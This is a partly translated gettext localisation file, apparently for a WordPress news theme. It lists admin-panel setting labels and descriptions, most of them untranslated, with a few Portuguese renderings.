backend/panels/header-style.php:211 backend/panels/header-style.php:247 #: backend/panels/header-style.php:500 backend/panels/header-style.php:536 #: backend/panels/header-style.php:766 backend/panels/header-style.php:802 msgid "Select a text color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:133 backend/panels/header-style.php:169 #: backend/panels/header-style.php:277 backend/panels/header-style.php:421 #: backend/panels/header-style.php:458 backend/panels/header-style.php:688 #: backend/panels/header-style.php:724 msgid "Select a text color when hovering." msgstr "" #: backend/category-settings.php:434 backend/panels/block-classic.php:121 #: backend/panels/block-grid.php:121 backend/panels/block-grid.php:286 #: backend/panels/block-grid.php:451 backend/panels/block-grid.php:624 #: backend/panels/block-grid.php:811 backend/panels/block-list.php:129 #: backend/panels/block-list.php:302 backend/panels/block-list.php:483 #: backend/panels/block-list.php:678 backend/panels/blog-pages.php:461 #: backend/panels/blog-pages.php:948 backend/panels/blog-pages.php:1362 #: backend/panels/blog-pages.php:1770 backend/panels/blog-pages.php:2262 #: backend/panels/bookmark.php:360 backend/panels/bookmark.php:808 msgid "Select a title HTML tag for the post title." msgstr "" #: backend/panels/heading.php:113 msgid "Select a title HTML tag for the sidebar widget heading." msgstr "" #: backend/panels/ads.php:238 msgid "Select a top and bottom spacing for the advert." msgstr "" #: backend/single-metaboxes.php:57 msgid "" "Select a top header style for this page. This option is used for the single " "page (not Elementor page)." msgstr "" #: backend/single-metaboxes.php:504 msgid "Select a type of review for this post." msgstr "" #: backend/single-metaboxes.php:323 msgid "" "Select a video layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:604 msgid "Select a website header style for the blog page." msgstr "" #: backend/panels/blog-pages.php:38 msgid "Select a website header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:1922 msgid "Select a website header style for the search page." msgstr "" #: backend/panels/header-style.php:57 backend/panels/header-style.php:351 #: backend/panels/header-style.php:602 msgid "Select a width style for this header." msgstr "" #: backend/panels/ads.php:78 msgid "Select ad settings for displaying at the top of your website." msgstr "" #: backend/panels/ads.php:266 msgid "Select ad settings for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:16 msgid "Select ad settings for your website." msgstr "" #: backend/panels/header.php:699 msgid "Select background color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:683 msgid "Select background color for the bar." msgstr "" #: backend/panels/blog-pages.php:1560 msgid "Select blog listing layout for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1152 msgid "Select blog listing layout for the author pages." msgstr "" #: backend/panels/blog-pages.php:738 msgid "Select blog listing layout for the blog." msgstr "" #: backend/panels/blog-pages.php:251 msgid "Select blog listing layout for the category pages." msgstr "" #: backend/panels/bookmark.php:155 msgid "Select blog listing layout for the saved pages." msgstr "" #: backend/panels/blog-pages.php:2052 msgid "Select blog listing layout for the search result listing." msgstr "" #: backend/category-settings.php:239 msgid "Select blog listing layout for this category." msgstr "" #: backend/panels/bookmark.php:595 msgid "Select blog listing layout for this section." msgstr "" #: backend/panels/color.php:16 msgid "" "Select colors for your website. To organize the panel and make it easy to " "use, you may also see color settings for each elements in it's panel." msgstr "" #: backend/panels/header.php:127 msgid "Select columns per row for this section." msgstr "" #: backend/panels/color.php:66 msgid "Select dark accent color in the dark mode." msgstr "" #: backend/panels/block-classic.php:148 backend/panels/block-grid.php:148 #: backend/panels/block-grid.php:313 backend/panels/block-grid.php:478 #: backend/panels/block-grid.php:651 backend/panels/block-grid.php:838 #: backend/panels/block-list.php:156 backend/panels/block-list.php:329 #: backend/panels/block-list.php:510 backend/panels/block-list.php:705 msgid "" "Select entry meta tags you would like to hide on the mobile devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/block-classic.php:139 backend/panels/block-grid.php:139 #: backend/panels/block-grid.php:304 backend/panels/block-grid.php:469 #: backend/panels/block-grid.php:642 backend/panels/block-grid.php:829 #: backend/panels/block-list.php:147 backend/panels/block-list.php:320 #: backend/panels/block-list.php:501 backend/panels/block-list.php:696 msgid "" "Select entry meta tags you would like to hide on the tablet devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/bookmark.php:404 msgid "" "Select entry meta you would like to hide on the mobile devices. In case long " "meta it would be useful." msgstr "" #: backend/panels/typography.php:999 msgid "" "Select font for mobile quick access menu items for displaying in the mobile " "device." msgstr "" #: backend/panels/typography.php:925 msgid "Select font for sub-level menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:970 msgid "Select font for sub-level menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:1112 msgid "Select font for the default archives, categories and menu fonts." msgstr "" #: backend/panels/typography.php:424 msgid "Select font for the entry category element." msgstr "" #: backend/panels/typography.php:124 msgid "" "Select font for the H1 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:173 msgid "" "Select font for the H2 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:222 msgid "" "Select font for the H3 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:271 msgid "" "Select font for the H4 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:320 msgid "" "Select font for the H5 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:369 msgid "" "Select font for the H6 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:581 msgid "" "Select font for the input, textarea and button. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:909 msgid "Select font for top menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:954 msgid "Select font for top menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:78 msgid "Select font sizes for the excerpt in the post listing." msgstr "" #: backend/panels/typography.php:473 msgid "" "Select font values for entry meta info: date, view, comment... Those options " "will not apply to the author meta." msgstr "" #: backend/panels/typography.php:896 msgid "Select font values for menus on the website header." msgstr "" #: backend/panels/typography.php:686 msgid "" "Select font values for Single Headline (Single Post Title) and Single " "Tagline (Single Sub Title)." msgstr "" #: backend/panels/typography.php:489 msgid "" "Select font values for the author, category meta, review description and " "sponsored brand." msgstr "" #: backend/panels/typography.php:1033 msgid "Select font values for the block heading." msgstr "" #: backend/panels/typography.php:813 msgid "Select font values for the block quote." msgstr "" #: backend/panels/typography.php:848 msgid "" "Select font values for the breadcrumb bar. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:1099 msgid "" "Select font values for the default widgets, apply to the archive, category " "widgets..." msgstr "" #: backend/panels/typography.php:418 msgid "" "Select font values for the entry category (category icon) in the post " "listing." msgstr "" #: backend/panels/typography.php:130 msgid "Select font values for the H1 tag and [ CSS classname: .h1]" msgstr "" #: backend/panels/typography.php:179 msgid "Select font values for the H2 tag and [ CSS classname: .h2]" msgstr "" #: backend/panels/typography.php:228 msgid "Select font values for the H3 tag and [ CSS classname: .h3]" msgstr "" #: backend/panels/typography.php:277 msgid "Select font values for the H4 tag and [ CSS classname: .h4]" msgstr "" #: backend/panels/typography.php:326 msgid "Select font values for the H5 tag and [ CSS classname: .h5]" msgstr "" #: backend/panels/typography.php:375 msgid "Select font values for the H6 tag and [ CSS classname: .h6]" msgstr "" #: backend/panels/typography.php:467 msgid "" "Select font values for the post entry meta. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:539 msgid "Select font values for the read more button" msgstr "" #: backend/panels/typography.php:533 msgid "Select font values for the read more button." msgstr "" #: backend/panels/typography.php:705 msgid "" "Select font values for the single headline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:762 msgid "" "Select font values for the single tagline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:30 msgid "" "Select font values for your website. The settings below apply to almost " "content elements on the website." msgstr "" #: backend/panels/bookmark.php:30 msgid "Select general settings for the bookmark system." msgstr "" #: backend/panels/design.php:569 msgid "Select hover effect settings for your website." msgstr "" #: backend/panels/single-post.php:30 msgid "Select layouts for the single post that based on the post formats." msgstr "" #: backend/category-settings.php:409 backend/panels/block-classic.php:91 #: backend/panels/block-grid.php:91 backend/panels/block-grid.php:256 #: backend/panels/block-grid.php:421 backend/panels/block-grid.php:594 #: backend/panels/block-grid.php:781 backend/panels/block-list.php:99 #: backend/panels/block-list.php:272 backend/panels/block-list.php:453 #: backend/panels/block-list.php:648 backend/panels/blog-pages.php:436 #: backend/panels/blog-pages.php:923 backend/panels/blog-pages.php:1337 #: backend/panels/blog-pages.php:1745 backend/panels/blog-pages.php:2237 #: backend/panels/bookmark.php:335 backend/panels/bookmark.php:783 msgid "select max length of the post excerpt." msgstr "" #: backend/panels/header.php:204 msgid "Select mode for the search button when clicking on." msgstr "" #: backend/single-metaboxes.php:130 msgid "Select navigation bar style for the header of this page." msgstr "" #: backend/single-metaboxes.php:907 msgid "Select navigation bar style for the header of this post." msgstr "" #: backend/panels/blog-pages.php:612 msgid "Select navigation bar style for the site header in the blog index page." msgstr "" #: backend/panels/blog-pages.php:46 msgid "Select navigation bar style for the site header in the category pages." msgstr "" #: backend/panels/blog-pages.php:1930 msgid "Select navigation bar style for the site header in the search page." msgstr "" #: backend/panels/header-style.php:69 backend/panels/header-style.php:614 msgid "Select navigation bar style for these header styles." msgstr "" #: backend/panels/single-post.php:1362 msgid "Select number of posts to show at once." msgstr "" #: backend/panels/woocommerce.php:72 msgid "" "Select number of products per page, leave blank if you want to set as " "Settings default." msgstr "" #: backend/panels/login.php:13 msgid "Select option for the login screen page." msgstr "" #: backend/panels/single-post.php:157 msgid "Select options for content area." msgstr "" #: backend/panels/single-post.php:1426 msgid "Select options for the ajax load next posts feature." msgstr "" #: backend/panels/header.php:115 msgid "" "Select options for the more menu and enable/disable it for each header style." msgstr "" #: backend/panels/privacy.php:8 msgid "Select options for the privacy notice bar." msgstr "" #: backend/panels/reaction.php:17 msgid "Select options for the reaction section." msgstr "" #: backend/panels/single-post.php:1251 msgid "" "Select options for the related and popular section at the footer of the " "single post page." msgstr "" #: backend/panels/single-post.php:1158 msgid "Select options for the review system." msgstr "" #: backend/panels/woocommerce.php:45 msgid "Select options for the shop and archive and single product pages." msgstr "" #: backend/panels/woocommerce.php:29 msgid "Select options for the shop." msgstr "" #: backend/panels/footer.php:16 msgid "" "Select options for your website footer. Navigate to Appearance > Widgets to " "add widgets to footer sections." msgstr "" #: backend/panels/header.php:17 msgid "Select options for your website header." msgstr "" #: backend/panels/optimized.php:15 msgid "Select options to optimize your website speed." msgstr "" #: backend/panels/logo.php:55 msgid "" "Select or upload a light logo for displaying in the dark mode. It should be " "same dimensions with the site logo." msgstr "" #: backend/panels/logo.php:71 msgid "" "Select or upload a light retina logo for displaying in the dark mode. It " "should be same dimensions with the retina site logo" msgstr "" #: backend/panels/logo.php:150 msgid "Select or upload bookmarklet icons for iOS and Android devices." msgstr "" #: backend/panels/logo.php:86 msgid "Select or upload logos for displaying in the mobile device." msgstr "" #: backend/panels/logo.php:116 msgid "Select or upload logos for displaying in the transparent headers." msgstr "" #: backend/panels/logo.php:63 msgid "" "Select or upload retina (2x) logo. Recommended logo height value is 120px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:47 msgid "" "Select or upload site logo. Recommended logo height value is 60px, allowed " "extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/blog-pages.php:1857 msgid "Select pagination type for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1449 msgid "Select pagination type for the author pages." msgstr "" #: backend/panels/blog-pages.php:1036 msgid "Select pagination type for the blog." msgstr "" #: backend/panels/blog-pages.php:548 msgid "Select pagination type for the category pages." msgstr "" #: backend/panels/blog-pages.php:2349 msgid "Select pagination type for the search result listing." msgstr "" #: backend/category-settings.php:226 msgid "Select pagination type for this category." msgstr "" #: backend/panels/bookmark.php:570 msgid "Select pagination type for this section." msgstr "" #: backend/panels/design.php:255 msgid "Select position for the custom meta label at the beginning or end." msgstr "" #: backend/panels/design.php:314 msgid "Select position to crop the featured image." msgstr "" #: backend/panels/blog-pages.php:1538 msgid "" "Select posts per page for the archives. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:1129 msgid "" "Select posts per page for the authors. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:714 msgid "" "Select posts per page for the blog. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:178 msgid "" "Select posts per page for the categories. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:2030 msgid "" "Select posts per page for the search result listing. Leave this option blank " "to set the default." msgstr "" #: backend/category-settings.php:170 msgid "" "Select posts per page for this category. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:562 msgid "Select posts per page for this section." msgstr "" #: backend/single-metaboxes.php:271 msgid "Select Primary Category" msgstr "" #: backend/panels/reaction.php:38 msgid "Select reaction items you would like to show." msgstr "" #: backend/panels/optimized.php:108 msgid "" "Select SEO options for your website. This panel helps your website optimized " "for SEO and appear better on the search engines." msgstr "" #: backend/panels/amp.php:278 msgid "Select setting for ads in AMP mode." msgstr "" #: backend/panels/amp.php:248 msgid "Select setting for auto ads in AMP mode." msgstr "" #: backend/panels/amp.php:172 msgid "Select setting for the single post your website in AMP mode." msgstr "" #: backend/panels/amp.php:29 backend/panels/amp.php:41 msgid "Select setting for your website in AMP mode." msgstr "" #: backend/panels/design.php:419 msgid "Select settings for post sliders on your website." msgstr "" #: backend/panels/header.php:176 msgid "Select settings for search form to display in the website header." msgstr "" #: backend/panels/table-contents.php:16 msgid "Select settings for table of contents." msgstr "" #: backend/panels/bookmark.php:16 msgid "Select settings for the bookmark system." msgstr "" #: backend/panels/single-post.php:1205 msgid "Select settings for the comment box." msgstr "" #: backend/panels/dark-mode.php:17 msgid "Select settings for the dark mode." msgstr "" #: backend/panels/single-post.php:472 msgid "Select settings for the entry category." msgstr "" #: backend/category-settings.php:346 backend/panels/block-classic.php:50 #: backend/panels/block-grid.php:50 backend/panels/block-grid.php:215 #: backend/panels/block-grid.php:380 backend/panels/block-grid.php:553 #: backend/panels/block-grid.php:740 backend/panels/block-list.php:58 #: backend/panels/block-list.php:231 backend/panels/block-list.php:412 #: backend/panels/block-list.php:607 backend/panels/blog-pages.php:375 #: backend/panels/blog-pages.php:862 backend/panels/blog-pages.php:1276 #: backend/panels/blog-pages.php:1684 backend/panels/blog-pages.php:2176 #: backend/panels/bookmark.php:274 backend/panels/bookmark.php:722 msgid "Select settings for the entry meta bar." msgstr "" #: backend/panels/newsletter.php:15 msgid "Select settings for the popup newsletter." msgstr "" #: backend/panels/header.php:520 msgid "Select settings for the popup sign in form." msgstr "" #: backend/category-settings.php:398 msgid "Select settings for the post excerpt." msgstr "" #: backend/panels/design.php:296 msgid "Select settings for the post featured image on your website." msgstr "" #: backend/panels/design.php:536 msgid "" "Select settings for the read more button on your website. You can " "enable/disable this part per module via Modules Design section." msgstr "" #: backend/panels/bookmark.php:90 msgid "Select settings for the reading list section." msgstr "" #: backend/panels/bookmark.php:504 msgid "Select settings for the recommended section." msgstr "" #: backend/panels/single-post.php:426 msgid "Select settings for the single sidebar." msgstr "" #: backend/panels/single-post.php:1125 msgid "Select settings for the sponsored posts." msgstr "" #: backend/panels/bookmark.php:440 msgid "Select settings for the user interests section." msgstr "" #: backend/panels/design.php:471 msgid "Select settings for your post entry meta." msgstr "" #: backend/panels/sidebar.php:8 msgid "" "Select settings for your website sidebars, The settings below apply to all " "sidebars." msgstr "" #: backend/panels/woocommerce.php:80 msgid "Select sidebar position for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/single-post.php:692 msgid "Select socials you would like to show the share button." msgstr "" #: backend/panels/single-post.php:562 msgid "Select styles, layouts and other settings for the single post meta." msgstr "" #: backend/panels/woocommerce.php:173 msgid "Select styling options of your shop." msgstr "" #: backend/panels/header.php:707 msgid "Select text color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:691 msgid "Select text color for the bar." msgstr "" #: backend/panels/sidebar.php:27 msgid "Select the default sidebar position for your website." msgstr "" #: backend/panels/header.php:51 msgid "Select the global header style for your website header." msgstr "" #: backend/panels/header.php:34 msgid "Select the style and other settings for your website header." msgstr "" #: backend/category-settings.php:259 msgid "" "Select total columns to show per row for the blog listing layout on the " "desktop device." msgstr "" #: backend/category-settings.php:275 msgid "" "Select total columns to show per row for the blog listing layout on the " "mobile device." msgstr "" #: backend/category-settings.php:267 msgid "" "Select total columns to show per row for the blog listing layout on the " "tablet device." msgstr "" #: backend/panels/blog-pages.php:275 backend/panels/blog-pages.php:762 #: backend/panels/blog-pages.php:1176 backend/panels/blog-pages.php:1584 #: backend/panels/blog-pages.php:2076 backend/panels/bookmark.php:179 #: backend/panels/bookmark.php:619 msgid "Select total columns to show per row on the mobile device." msgstr "" #: backend/panels/blog-pages.php:267 backend/panels/blog-pages.php:754 #: backend/panels/blog-pages.php:1168 backend/panels/blog-pages.php:1576 #: backend/panels/blog-pages.php:2068 backend/panels/bookmark.php:171 #: backend/panels/bookmark.php:611 msgid "Select total columns to show per row on the tablet device." msgstr "" #: backend/panels/blog-pages.php:259 backend/panels/blog-pages.php:746 #: backend/panels/blog-pages.php:1160 backend/panels/blog-pages.php:1568 #: backend/panels/blog-pages.php:2060 backend/panels/bookmark.php:163 #: backend/panels/bookmark.php:603 msgid "Select total columns to show per row." msgstr "" #: backend/panels/woocommerce.php:148 msgid "" "Select total related product to show at once. leave blank if you want to set " "as default." msgstr "" #: backend/panels/amp.php:482 backend/panels/amp.php:542 msgid "Select your ad type to display at the bottom single content." msgstr "" #: backend/panels/amp.php:361 msgid "Select your ad type to display at the footer." msgstr "" #: backend/panels/amp.php:301 msgid "Select your ad type to display at the header." msgstr "" #: backend/panels/amp.php:421 msgid "Select your ad type to display at the top single content." msgstr "" #: backend/single-metaboxes.php:398 msgid "Self-Hosted Audio" msgstr "" #: backend/single-metaboxes.php:350 msgid "Self-Hosted Video" msgstr "" #: backend/panels/optimized.php:107 msgid "SEO Optimized" msgstr "" #: backend/panels/optimized.php:115 msgid "SEO Snippets" msgstr "" #: backend/panels/dark-mode.php:43 msgid "" "Set the dark mode as the default color scheme when users visit your website " "a the first time." msgstr "" #: backend/panels/ads.php:287 msgid "Setup below settings corresponding to your ad type." msgstr "" #: backend/panels/design.php:231 msgid "" "Setup your custom meta to display in the post listing and single post page." msgstr "" #: backend/configs.php:875 backend/panels/blog-pages.php:50 #: backend/panels/blog-pages.php:616 backend/panels/blog-pages.php:1934 #: backend/panels/header-style.php:71 backend/panels/header-style.php:616 #: backend/single-metaboxes.php:133 backend/single-metaboxes.php:910 msgid "Shadow" msgstr "" #: templates/single/templates.php:269 msgid "SHARE" msgstr "" #: templates/single/templates.php:323 templates/single/templates.php:1532 msgid "Share" msgstr "Compartilhar" #: backend/panels/single-post.php:1507 msgid "Share on Facebook" msgstr "" #: backend/panels/single-post.php:1523 msgid "Share on Reddit" msgstr "" #: backend/panels/single-post.php:690 msgid "Share on Socials" msgstr "" #: backend/panels/single-post.php:1515 msgid "Share on Twitter" msgstr "" #: templates/single/templates.php:808 msgid "Share this Article" msgstr "" #: backend/panels/woocommerce.php:102 msgid "Shop - Archive Pages Options" msgstr "" #: backend/panels/woocommerce.php:54 msgid "Shop Page Options" msgstr "" #: backend/panels/woocommerce.php:87 msgid "Shop Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:79 msgid "Shop Sidebar Position" msgstr "" #: backend/panels/optimized.php:182 msgid "" "Short description will display when searching your main site URL. Leave " "blank if you use 3rd plugins." msgstr "" #: backend/panels/header.php:732 msgid "Show a cart icon at the website header." msgstr "" #: backend/panels/single-post.php:1565 msgid "" "Show a font size icon that give visitors of your site the option to change " "the font size of your text." msgstr "" #: backend/panels/footer.php:54 msgid "Show a gray border a the top footer." msgstr "" #: backend/panels/design.php:550 msgid "Show a icon after the read more label." msgstr "" #: backend/panels/ads.php:455 msgid "Show ads or any shortcode in the slide up footer section." msgstr "" #: backend/panels/single-post.php:1441 msgid "Show Continue Reading" msgstr "" #: backend/panels/footer.php:107 msgid "Show gray borders between widget columns." msgstr "" #: backend/panels/table-contents.php:148 msgid "Show Hierarchy" msgstr "" #: backend/category-settings.php:144 backend/panels/blog-pages.php:134 #: backend/panels/blog-pages.php:671 msgid "Show in all pages" msgstr "" #: backend/category-settings.php:143 backend/panels/blog-pages.php:133 #: backend/panels/blog-pages.php:670 msgid "Show in the first page" msgstr "" #: backend/panels/header.php:739 msgid "Show mini cart icon in the header." msgstr "" #: backend/panels/header.php:747 msgid "Show mini cart icon in the mobile header." msgstr "" #: backend/panels/single-post.php:1373 includes/menu.php:244 #: includes/menu.php:297 templates/header/templates.php:701 #: templates/parts.php:326 msgid "Show More" msgstr "" #: backend/panels/table-contents.php:156 msgid "Show Number list" msgstr "" #: backend/panels/woocommerce.php:181 msgid "Show Percentage Saved" msgstr "" #: backend/panels/woocommerce.php:137 msgid "Show Review Box" msgstr "" #: backend/panels/header.php:223 msgid "Show search form at the top of the more section." msgstr "" #: backend/panels/single-post.php:1604 msgid "Show Share Bar" msgstr "" #: backend/category-settings.php:139 backend/panels/blog-pages.php:130 #: backend/panels/blog-pages.php:667 msgid "Show template in the first or all pages." msgstr "" #: backend/panels/design.php:104 msgid "Show the \"posted\" text before the post author meta." msgstr "" #: backend/panels/single-post.php:593 msgid "Show the \"posted\" text before the single post author meta." msgstr "" #: backend/panels/design.php:118 msgid "Show the clock icon before the post updated meta." msgstr "" #: backend/panels/design.php:338 msgid "Show the edit post link in the featured image for logged users." msgstr "" #: backend/panels/design.php:146 msgid "Show the icon before the post category meta." msgstr "" #: backend/panels/design.php:125 msgid "Show the icon before the post comment meta." msgstr "" #: backend/panels/design.php:111 msgid "Show the icon before the post date meta." msgstr "" #: backend/panels/design.php:132 msgid "Show the icon before the post view meta." msgstr "" #: backend/panels/design.php:139 msgid "Show the icon before the reading time meta." msgstr "" #: backend/panels/single-post.php:1492 msgid "" "Show the popup shares bar when the user highlight text in the post content." msgstr "" #: backend/panels/single-post.php:1212 backend/panels/single-post.php:1473 msgid "Show/Hide Comment Button" msgstr "" #: templates/blog.php:233 #, php-format msgid "Showing %s results for your search" msgstr "Mostrando %s resultados para sua pesquisa" #: backend/panels/reaction.php:54 msgid "Shy" msgstr "" #: backend/panels/ads.php:477 msgid "Side Up Expired" msgstr "" #: backend/panels/typography.php:1105 msgid "Sidebar Archive & Menu Widgets" msgstr "" #: backend/panels/page.php:60 backend/panels/sidebar.php:7 #: backend/panels/single-post.php:424 backend/single-metaboxes.php:83 #: backend/single-metaboxes.php:442 msgid "Sidebar Area" msgstr "" #: backend/category-settings.php:295 backend/panels/blog-pages.php:305 #: backend/panels/blog-pages.php:792 backend/panels/blog-pages.php:1206 #: backend/panels/blog-pages.php:1614 backend/panels/blog-pages.php:2106 #: backend/panels/bookmark.php:208 backend/panels/bookmark.php:656 #: backend/panels/page.php:66 backend/panels/single-post.php:441 #: backend/single-metaboxes.php:88 backend/single-metaboxes.php:447 msgid "Sidebar Position" msgstr "" #: backend/panels/amp.php:231 msgid "Sidebar Section" msgstr "" #: backend/panels/heading.php:90 msgid "Sidebar Widget Heading" msgstr "" #: backend/panels/header.php:532 templates/header/templates.php:315 #: templates/header/templates.php:317 templates/header/templates.php:616 #: templates/popup.php:191 msgid "Sign In" msgstr "Entrar" #: templates/parts.php:825 msgid "Sign In to Follow" msgstr "" #: bookmark/template-helpers.php:59 msgid "Sign In to Save" msgstr "" #: backend/panels/header.php:567 msgid "Sign in to your account" msgstr "" #: templates/header/templates.php:310 msgid "Sign Out" msgstr "Sair" #: backend/panels/single-post.php:343 msgid "Sign Up For Daily Newsletter" msgstr "" #: backend/configs.php:561 backend/panels/blog-pages.php:1453 #: backend/panels/blog-pages.php:1861 msgid "Simple" msgstr "" #: includes/sidebars.php:164 msgid "Single Content - Bottom Area" msgstr "" #: includes/sidebars.php:155 msgid "Single Content - Top Area" msgstr "" #: backend/panels/typography.php:692 msgid "Single Headline Fonts (Post Title)" msgstr "" #: backend/panels/single-post.php:44 msgid "Single Layout" msgstr "" #: backend/panels/page.php:16 msgid "Single Page" msgstr "" #: backend/panels/breadcrumb.php:61 msgid "Single Page Breadcrumb" msgstr "" #: backend/single-metaboxes.php:44 msgid "Single Page Settings" msgstr "" #: backend/panels/amp.php:171 backend/panels/single-post.php:14 #: backend/panels/typography.php:683 msgid "Single Post" msgstr "" #: backend/panels/breadcrumb.php:50 msgid "Single Post Breadcrumb" msgstr "" #: backend/panels/woocommerce.php:131 msgid "Single Product Page" msgstr "" #: backend/panels/single-post.php:514 msgid "Single Tagline" msgstr "" #: backend/panels/typography.php:749 msgid "Single Tagline Fonts (Sub Title)" msgstr "" #: backend/single-metaboxes.php:167 backend/single-metaboxes.php:944 msgid "Site Footer" msgstr "" #: backend/category-settings.php:51 backend/panels/blog-pages.php:31 #: backend/panels/blog-pages.php:597 backend/panels/blog-pages.php:1915 #: backend/panels/single-post.php:1540 backend/single-metaboxes.php:107 #: backend/single-metaboxes.php:113 msgid "Site Header" msgstr "" #: backend/panels/optimized.php:129 msgid "Sitelinks Search Box" msgstr "" #: templates/parts.php:615 msgid "Skype" msgstr "" #: backend/panels/socials.php:80 msgid "Skype URL" msgstr "" #: backend/configs.php:846 msgid "Skyscraper (120x600)" msgstr "" #: backend/panels/reaction.php:45 msgid "Sleepy" msgstr "" #: backend/panels/design.php:445 msgid "Slide" msgstr "" #: backend/panels/design.php:442 msgid "Slide Effect" msgstr "" #: backend/panels/ads.php:500 msgid "Slide Up Background" msgstr "" #: backend/panels/ads.php:469 msgid "Slide Up Template Shortcode" msgstr "" #: backend/panels/design.php:418 msgid "Slider Animation" msgstr "" #: backend/panels/page.php:45 backend/panels/single-post.php:185 #: backend/single-metaboxes.php:74 msgid "Small - 860px" msgstr "" #: backend/category-settings.php:248 backend/configs.php:467 #: backend/panels/block-grid.php:347 msgid "Small Grid" msgstr "" #: backend/panels/block-grid.php:357 msgid "small grid" msgstr "" #: backend/panels/single-post.php:1339 msgid "Small Grid 1 (4 Columns)" msgstr "" #: backend/configs.php:848 msgid "Small Rectangle (180x150)" msgstr "" #: backend/configs.php:850 msgid "Small Square (200x200)" msgstr "" #: backend/panels/header.php:89 msgid "Smart Sticky" msgstr "" #: backend/panels/table-contents.php:163 msgid "Smooth Scroll" msgstr "" #: templates/parts.php:618 msgid "SnapChat" msgstr "" #: backend/panels/socials.php:86 msgid "Snapchat URL" msgstr "" #: backend/panels/amp.php:103 backend/panels/footer.php:164 #: backend/panels/header-style.php:36 backend/panels/header-style.php:330 #: backend/panels/header-style.php:581 msgid "Social Icons" msgstr "" #: backend/panels/socials.php:14 backend/panels/socials.php:22 msgid "Social Profiles" msgstr "" #: backend/panels/header.php:373 backend/panels/single-post.php:1627 msgid "Socials List" msgstr "" #: backend/configs.php:612 msgid "Solid Light Gray" msgstr "" #: backend/panels/optimized.php:44 msgid "" "Some 3rd party plugins will load this font icon. Disable it if you have not " "plan to use it." msgstr "" #: backend/class-tgm-plugin-activation.php:345 backend/install-plugins.php:69 msgid "Something went wrong with the plugin API." msgstr "" #: templates/page.php:121 msgid "Something's wrong here..." msgstr "" #: templates/ajax.php:188 templates/blog.php:520 msgid "" "Sorry, but nothing matched your search terms. Please try again with some " "different keywords." msgstr "" "Desculpe, mas nada corresponde aos seus termos de pesquisa. Por favor, tente " "novamente com algumas palavras-chave diferentes." #: backend/install-plugins.php:75 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s plugin." " Contact the administrator of this site for help on getting the plugin " "activated." msgstr "" #: backend/install-plugins.php:72 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "installed." msgstr "" #: backend/install-plugins.php:77 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "updated." msgstr "" #: templates/parts.php:633 msgid "SoundCloud" msgstr "" #: backend/panels/socials.php:116 msgid "Soundcloud URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: backend/single-metaboxes.php:778 msgid "Source Name" msgstr "" #: backend/single-metaboxes.php:783 msgid "Source URL" msgstr "" #: backend/panels/single-post.php:304 msgid "Sources Bar" msgstr "" #: backend/single-metaboxes.php:766 msgid "Sources/Via" msgstr "" #: templates/single/templates.php:670 msgid "SOURCES:" msgstr "Fontes:" #: backend/panels/ads.php:237 msgid "Spacing" msgstr "" #: backend/configs.php:244 backend/panels/single-post.php:537 #: backend/single-metaboxes.php:230 msgid "span" msgstr "" #: backend/single-metaboxes.php:642 msgid "Sponsor Light Logo" msgstr "" #: backend/single-metaboxes.php:636 msgid "Sponsor Logo" msgstr "" #: backend/single-metaboxes.php:629 msgid "Sponsor Name" msgstr "" #: backend/single-metaboxes.php:622 msgid "Sponsor URL" msgstr "" #: backend/panels/single-post.php:1134 templates/entry.php:1201 msgid "Sponsored by" msgstr "" #: backend/panels/block-classic.php:113 backend/panels/block-grid.php:113 #: backend/panels/block-grid.php:278 backend/panels/block-grid.php:443 #: backend/panels/block-grid.php:616 backend/panels/block-grid.php:803 #: backend/panels/block-list.php:121 backend/panels/block-list.php:294 #: backend/panels/block-list.php:475 backend/panels/block-list.php:670 msgid "Sponsored Meta" msgstr "" #: backend/panels/single-post.php:1132 msgid "Sponsored Meta Text" msgstr "" #: backend/panels/single-post.php:1123 backend/single-metaboxes.php:606 #: backend/single-metaboxes.php:611 msgid "Sponsored Post" msgstr "" #: backend/configs.php:851 msgid "Square (250x250)" msgstr "" #: backend/panels/blocks.php:14 msgid "Standard Blog Design" msgstr "" 